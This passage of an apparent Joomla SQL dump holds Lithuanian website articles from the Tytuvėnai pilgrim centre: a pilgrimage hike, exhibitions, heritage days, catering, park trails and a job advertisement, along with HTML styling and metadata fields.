style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Paskutinį pavasario savaitgalį VšĮ ,,Tytuvėnų piligrimų centras‘‘ ir Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės parapija kvietė žygiuoti  maloniu keliu ,,Via Gratiarum‘‘. </span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Piligriminio žygio vadovai  siūlė įveikti 19 km. maršrutą Kiaunoriai – Tytuvėnai sujungiant dvi garsėjančias vietas - Kiaunorių ir Tytuvėnų  bažnyčias bei jas globojančius šventuosius: Šv. Pranciškų ir Šv. Juozapą. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Žygio tema ,,Tėvo širdimi” parinkta neatsistiktinai. “Tėvu negimstama, tėvu tampama” -   taip  kun. Evaldas Alūza įprasmino šį piligriminį žygį. Šv. Juozapas buvo tas, kuris galėjo Jėzų apgaubti tėviška meile, jį matė kasdien, bendravo, stebėjo kaip jis auga, auklėjo, priglausdavo savo tvirtame vyriškame glėbyje, mylėjo jį kaip tėvas ir stengėsi suvokti, koks yra Dievo planas jam – Jėzaus tėvui – bendroje išganymo istorijoje ir Jėzaus gyvenimo kelyje... </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Palaiminti Kiaunorių Šv. Juozapo parapijos kun. Donato Grabažio iškeliavome į piligriminį žygį. Kelyje buvo visko: džiaugsmo, apmąstymų, susikaupimo, saulės ir  lietaus, tačiau visi judėdami ta pačia kryptimi ir su vienu tikslu sėkmingai pasiekėme piligriminės kelionės tikslą.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Dėkojame Dievui už palaiminimą ir geriesiems žmonėms pastačiusiems  per Gryžuvos upę tiltą. Rimidui ir Danai Milašauskams, Tytuvėnų krašto bendruomenės pirmininkui Vytautui Mačiūnui, Tytuvėnų miesto seniūnijai.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>{gallery cols=3 orientation=horizontal </span><span> width=300</span><span>}stories/naujienos/zygis_via/{/gallery}</span></span></p>',1,0,0,44,'2022-05-31 21:00:24',135,'','2022-05-31 21:07:07',135,0,'0000-00-00 00:00:00','2022-05-31 21:00:24','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/zygis_via\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,20,'','',1,1375,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(371,462,'Senųjų žemaitiškų rakandų paroda','senuju-zemaitisku-rakandu-paroda','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Senųjų žemaitiškų rakandų paroda bei edukacijų pristatymas su jaunuoju kriviu krivaičiu Bruteniu.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2022 07 08  12-20 val.<br />2022 07 22  12-20 val.<br />2022 07 29 12-20 val.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/kursiai/kursiai.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2022-07-05 04:41:18',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2022-07-05 04:41:18','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/kursiai\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,19,'','',1,1353,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(372,463,'Bažnyčių naktys','baznyciu-naktys-2022','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Liepos 21-24 d.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/bnaktys/kelme.jpg\" border=\"0\" alt=\"\" /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/bnaktys/bendra.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2022-07-07 20:57:19',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2022-07-07 20:57:19','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/bnaktys\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,18,'','',1,2004,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(373,464,'Maitinimas (2)','maitinimas-2','','<p style=\"text-align: justify;\">           Tytuvėnai – miestelis įsikūręs šiaurės Lietuvoje, kur susikerta keliai iš Radviliškio, Šiaulių, Kelmės, Šiluvos. Vidury miesto stovi didinga Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčia ir Tytuvėnų bernardinų vienuolynas. Bažnyčios ir vienuolyno ansamblyje galite gauti ne tik kultūrines programas, tokias kaip ekskursijos, edukacijos (Piligrimų gira, Vaistažolių edukacinė programa), gido paslaugos, dviračių nuoma, piligrimų namai „Domus Rafaeli“, bet ir maitinimo paslaugas Tytuvėnų vienuolyno patalpose. Tytuvėnų vienuolyne priimami banketai, furšetai, grupių maitinimas, šventiniai staliukai, krikštynos, vestuvės. Aplinka ir maistu nenusivilsite.</p>\r\n<p>Maitinimas yra užsakomas iš anksto susitarus.</p>\r\n<p style=\"text-align: left;\" align=\"center\"><strong><img src=\"images/meniu/2022/1.jpg\" border=\"0\" alt=\"\" /></strong></p>\r\n<p style=\"text-align: left;\" align=\"center\"><strong><br /><img src=\"images/meniu/2022/2.jpg\" border=\"0\" alt=\"\" /></strong></p>\r\n<p style=\"text-align: left;\" align=\"center\"><strong><br /><img src=\"images/meniu/2022/3.jpg\" border=\"0\" alt=\"\" /></strong></p>\r\n<p style=\"text-align: left;\" align=\"center\"><strong><br /><img src=\"images/meniu/2022/4.jpg\" border=\"0\" alt=\"\" /></strong></p>\r\n<p style=\"text-align: left;\" align=\"center\"><strong><br /><img src=\"images/meniu/2022/5.jpg\" border=\"0\" alt=\"\" /></strong></p>\r\n<p style=\"text-align: left;\" align=\"center\"><strong><br /><img src=\"images/meniu/2022/6.jpg\" border=\"0\" alt=\"\" /><br /></strong></p>\r\n<p style=\"text-align: left;\" align=\"center\"><strong><br /><img src=\"images/meniu/2022/7.jpg\" border=\"0\" alt=\"\" /><br /></strong></p>','',1,0,0,31,'2018-06-18 12:18:47',135,'','2022-05-02 20:26:54',0,0,'0000-00-00 00:00:00','2018-06-18 12:18:47','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,2,'','',1,185,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(375,466,'EUROPOS PAVELDO DIENOS \'22','europos-paveldo-dienos-22','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Rugsėjo 9 - 18 dienomis vyko Europos paveldo dienos. </span></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šių metų tema - tvarus paveldas. VšĮ \"Tytuvėnų piligrimų centras\" kvietė nemokamai susipažinti su šimtmečius esančiu paveldo objektu - Tytuvėnų bažnyčios ir vienuolyno ansambliu, vienu iš geriausių tvarumo pavyzdžių. Čia rengiamos ekskursijos, edukacijos kviečiančios pažinti kultūros paveldą, kitu kampu pažvelgti į jo autentiką bei suvokti jo neįkainojamą vertę. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/europos_paveldo_dienos22/europos_paveldo_dienos.jpg\" border=\"0\" width=\"1160\" /></span></p>\r\n<p style=\"text-align: justify;\"> </p>',1,0,0,44,'2022-09-19 19:19:24',135,'','2022-09-19 19:25:32',135,0,'0000-00-00 00:00:00','2022-09-19 19:19:24','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/europos_paveldo_dienos22\\/europos_paveldo_dienos_main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,16,'','',1,1717,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(376,467,'Tytuvėnų regioninio parko pėsčiųjų trasos','pesciuju-trasos','','<p><strong>Pažinti parką kviečiame keliaujant PĖSČIOMIS!  Žemiau pateikiami žemėlapiai sukurti Google My Maps aplinkoje, todėl Google žemėlapių programėlėje matysite trasos informaciją ir savo buvimo vietą. </strong></p>\r\n<p> </p>\r\n<div> </div>\r\n<div><strong>&lt;img src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t66/1/24/1f463.png\" border=\"0\" alt=\"</strong></div>','',1,0,0,58,'2022-09-19 19:32:17',135,'','2022-09-19 19:38:06',135,0,'0000-00-00 00:00:00','2022-09-19 19:32:17','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,1,'','',1,104,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(377,469,'Tytuvėnų regioninio parko dviračių trasos','dviraciu-trasos','','<p><strong>Pažinti parką kviečiame keliaujant DVIRAČIAIS!  Žemiau pateikiami žemėlapiai sukurti Google My Maps aplinkoje, todėl Google žemėlapių programėlėje matysite trasos informaciją ir savo buvimo vietą. </strong></p>\r\n<div> </div>\r\n<div>\r\n<p><strong><img src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tbd/1/24/1f6b4.png\" border=\"0\" alt=\"','',1,0,0,58,'2022-09-19 19:35:28',135,'','2022-09-19 19:52:34',135,0,'0000-00-00 00:00:00','2022-09-19 19:35:28','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,0,'','',1,105,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(379,471,'Piligrimystės reikšmė ir patirtys','piligrimystes-reiksme-ir-patirtys','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Renginys vyks gruodžio 6 d.</span></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/reiksme_ir_patirtys/reiksme_ir_patirtys.jpg\" border=\"0\" width=\"1160\" style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\" /></p>\r\n<p style=\"text-align: justify;\"> </p>',1,0,0,44,'2022-11-28 05:12:13',135,'','2022-11-28 05:12:50',135,0,'0000-00-00 00:00:00','2022-11-28 05:12:13','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/reiksme_ir_patirtys\\/mian.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,14,'','',1,2849,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(380,472,'Vasario 16-osios minėjimas','vasario-16-osios-minejimas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Vasario 16-osios minėjimas Tytuvėnuose</span></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/vasario16/20230123/vasario16_tytuvenai.jpg\" border=\"0\" width=\"1160\" style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\" /></p>\r\n<p style=\"text-align: justify;\"> </p>',1,0,0,44,'2023-01-23 20:56:34',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2023-01-23 20:56:34','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/vasario16\\/20230123\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,13,'','',1,2603,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(381,473,'Ieškome renginių organizatoriaus (-ės)','ieskome-renginiu-organizatoriaus','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Kviečiame prisijungti prie darbuotojų komandos!</span></span></p>\r\n','\r\n<p><strong>V</strong><strong>šĮ ,,Tytuvėnų piligrimų centras‘‘ kviečia prisijungti prie darbuotojų komandos</strong></p>\r\n<p><strong>Ieškome renginių organizatoriaus (-ės)</strong></p>\r\n<p> </p>\r\n<p><strong>Reikalavimai renginių organizatoriaus (-ės) pareigybei užimti:</strong></p>\r\n<ul>\r\n<li> turėti aukštąjį universitetinį arba jam prilygstantį išsilavinimą;</li>\r\n<li> turėti bent vienerių metų organizacinio darbo patirtį;</li>\r\n<li>Išmanyti su organizacine veikla susijusių dokumentų rengimo taisykles;</li>\r\n<li>Mokėti vertinti, analizuoti įstaigos veiklą;</li>\r\n<li>Mokėti bent vieną užsienio kalbą;</li>\r\n<li>Gebėti dirbti su kompiuterinėmis programomis, būti pareigingam, atsakingam, išmanyti profesinę etiką, kalbos kultūros normas, turi būti susipažinęs su materialinės atsakomybės tvarka;</li>\r\n<li>Būti susipažinus su viešųjų pirkimų procedūromis.</li>\r\n</ul>\r\n<p>Prašome pateikti:</p>\r\n<ol>\r\n<li>Asmens dokumento kopiją;</li>\r\n<li>Gyvenimo aprašymą (CV);</li>\r\n<li>Išsilavinimą patvirtinančio dokumento kopiją;</li>\r\n</ol>\r\n<p>Dokumentai priimami iki 2023 m. vasario 23 d. 9 val. adresu Maironio g. 2A, Tytuvėnai, arba el. p. <a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a></p>\r\n<p><strong>Darbo u</strong><strong>žmokestis nuo 1050 Eur ( neatskaičius mokesčių)</strong></p>\r\n<p>Atrankos būdas – pokalbis su pretendentais, vyks 2023 m. kovo 1 d. 10 val. adresu Maironio g. 2A, Tytuvėnai, Kelmės r.</p>',1,0,0,44,'2023-02-21 21:52:06',135,'','2023-02-21 21:54:26',135,0,'0000-00-00 00:00:00','2023-02-21 21:52:06','0000-00-00 